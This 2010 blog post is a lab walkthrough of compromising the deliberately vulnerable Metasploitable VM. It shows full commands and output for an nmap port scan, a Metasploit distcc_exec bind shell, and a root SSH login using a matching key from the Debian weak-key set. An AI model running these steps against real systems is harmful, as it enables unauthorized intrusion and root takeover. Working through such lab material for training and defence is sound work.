Hacking distcc with Metasploit…

July 3, 2010 at 11:27 am (Metasploit, Security)

Hey,

I have been playing around with Metasploitable. This is a test system produced by the Metasploit team that is very vulnerable. One of the services it is running is distcc. Today I will show you how to own it using Metasploit…

First of all we shall start with a port scan of the system:

root@bt:~# nmap -sV -sS -p1-65535 10.113.8.102

Starting Nmap 5.21 ( http://nmap.org ) at 2010-07-03 11:04 BST
Nmap scan report for ml-dkelly.messagelabs.com (10.113.8.102)
Host is up (0.0034s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:9F:54:C9 (VMware)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.45 seconds
root@bt:~#

We are most interested in the following line:

3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Right, so let’s fire up Metasploit then:

root@bt:/pentest/exploits/framework3# ./msfconsole

____________

------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 276 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9671 updated today (2010.07.03)

msf > search distcc
[*] Searching loaded modules for pattern ‘distcc’…

Exploits
========

Name Rank Description
---- ---- -----------
unix/misc/distcc_exec excellent DistCC Daemon Command Execution

msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port


Exploit target:

Id Name
-- ----
0 Automatic Target

msf exploit(distcc_exec) > set RHOST 10.113.8.102
RHOST => 10.113.8.102
msf exploit(distcc_exec) > show payloads

Compatible Payloads
===================

Name Rank Description
---- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/generic normal Unix Command, Generic command execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)

msf exploit(distcc_exec) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf exploit(distcc_exec) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.113.8.102 yes The target address
RPORT 3632 yes The target port

Payload options (cmd/unix/bind_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 10.113.8.102 no The target address

Exploit target:

Id Name
-- ----
0 Automatic Target

msf exploit(distcc_exec) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (10.113.10.116:55064 -> 10.113.8.102:4444) at Sat Jul 03 11:54:29 +0100 2010

whoami; uname -ar
daemon
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

Excellent, so we managed to get a bind shell working and now have command execution on the target system.. but what else can we do? Well we should be able to use their ssh key and login as root. First we must download: debian_ssh_rsa_2048_x86.tar.bz2. You can quickly pop that into google and find a place to download such as here. Once you have downloaded it, un-compress it, then perform the following steps:

* SNIP *
rsa/2048/22395760ea6265919ef5db8d26dda56c-17578
rsa/2048/e311fc52da0d062cd6e9a507a7470db8-15835.pub
rsa/2048/ae88b6e25a832541ac60978e90fb40fe-28014
rsa/2048/759ee1c853d2fcc07a13e6867ed75a35-26843
rsa/2048/22817b9fcfca9c043d6d48dac528b0a6-3298
rsa/2048/cd84c0196af31046b45037f39208c9c1-11710
rsa/2048/9634a42c34d72e776593a9f1ddd38085-2633
rsa/2048/1668b5d4171480a6359c0966ded47550-15730
rsa/2048/b8a7774ef9e5b9b2b73a685e509b899b-2131
root@bt:~/rsa/2048# grep -lir AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub

57c3115d77c56390332dc5c49978627a-5429.pub
root@bt:~/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@10.113.8.102
Last login: Sat Jul 3 07:01:04 2010 from 10.113.10.116
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#

So we managed to get a shell on the vulnerable system 🙂

Advertisements

1 Comment

  1. Minnie Vanscoy said,

    This paragraph gives clear idea in favor of the new viewers of blogging, that truly how to do blogging.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: